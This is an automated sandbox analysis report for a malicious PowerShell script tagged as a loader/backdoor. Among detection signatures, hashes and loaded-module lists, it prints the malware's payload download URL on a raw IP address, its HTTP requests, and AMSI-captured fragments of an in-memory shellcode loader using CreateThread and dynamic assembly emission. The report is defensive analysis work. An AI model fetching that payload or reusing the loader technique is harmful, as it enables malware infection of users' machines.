Windows Analysis Report
1ZhE3yY8rV.ps1

Overview

General Information

Sample name: 1ZhE3yY8rV.ps1
renamed because original name is a hash value
Original sample name: e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908.ps1
Analysis ID: 1542345
MD5: ea20c34ae2665307c372d81bfe2effda
SHA1: e384870516959d04dd002c52b0f16c30311eaf6f
SHA256: e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908
Tags: 217-195-153-196koiloaderps1TMBackdooruser-JAMESWT_MHT
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 1ZhE3yY8rV.ps1 Avira: detected
Multi AV Scanner detection for submitted file
Source: 1ZhE3yY8rV.ps1 ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.8% probability
Source: Binary string: System.Configuration.Install.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb0Do source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbJ* source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32* source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb)p source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: CallSite.Targetore.pdb u source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdbMZ@ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbXa source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: softy.pdbathuw source: powershell.exe, 00000000.00000002.2185663505.000001995A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdbH source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.pdbSystem.Management.dllSystem.Xml.ni.dll source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb3 source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: global traffic HTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2159022873.0000019943B6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://217.195.153.196
Source: powershell.exe, 00000000.00000002.2159022873.0000019943D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://217.195.153.196/assets/paleo
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp, 1ZhE3yY8rV.ps1 String found in binary or memory: http://217.195.153.196/assets/paleochorologyma.exe
Source: powershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B7620DD 0_2_00007FFD9B7620DD
One or more processes crash
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028
Source: classification engine Classification label: mal64.evad.winPS1@3/10@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7552
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uavqn0lg.tef.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: 1ZhE3yY8rV.ps1 ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Configuration.Install.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb0Do source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbJ* source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32* source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb)p source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: CallSite.Targetore.pdb u source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdbMZ@ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbXa source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: softy.pdbathuw source: powershell.exe, 00000000.00000002.2185663505.000001995A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdbH source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.pdbSystem.Management.dllSystem.Xml.ni.dll source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb3 source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($VAAddr, $VADeleg)$CTAddr = GPA kernel32.dll CreateThread$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])$CT = $marshal::GetDelegat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $MB = $AB.DefineDynamicModule('IMM', $false) $TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoCl
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B7643A5 push edi; iretd 0_2_00007FFD9B7643A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B760952 push E95B72D0h; ret 0_2_00007FFD9B7609C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B7600BD pushad ; iretd 0_2_00007FFD9B7600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
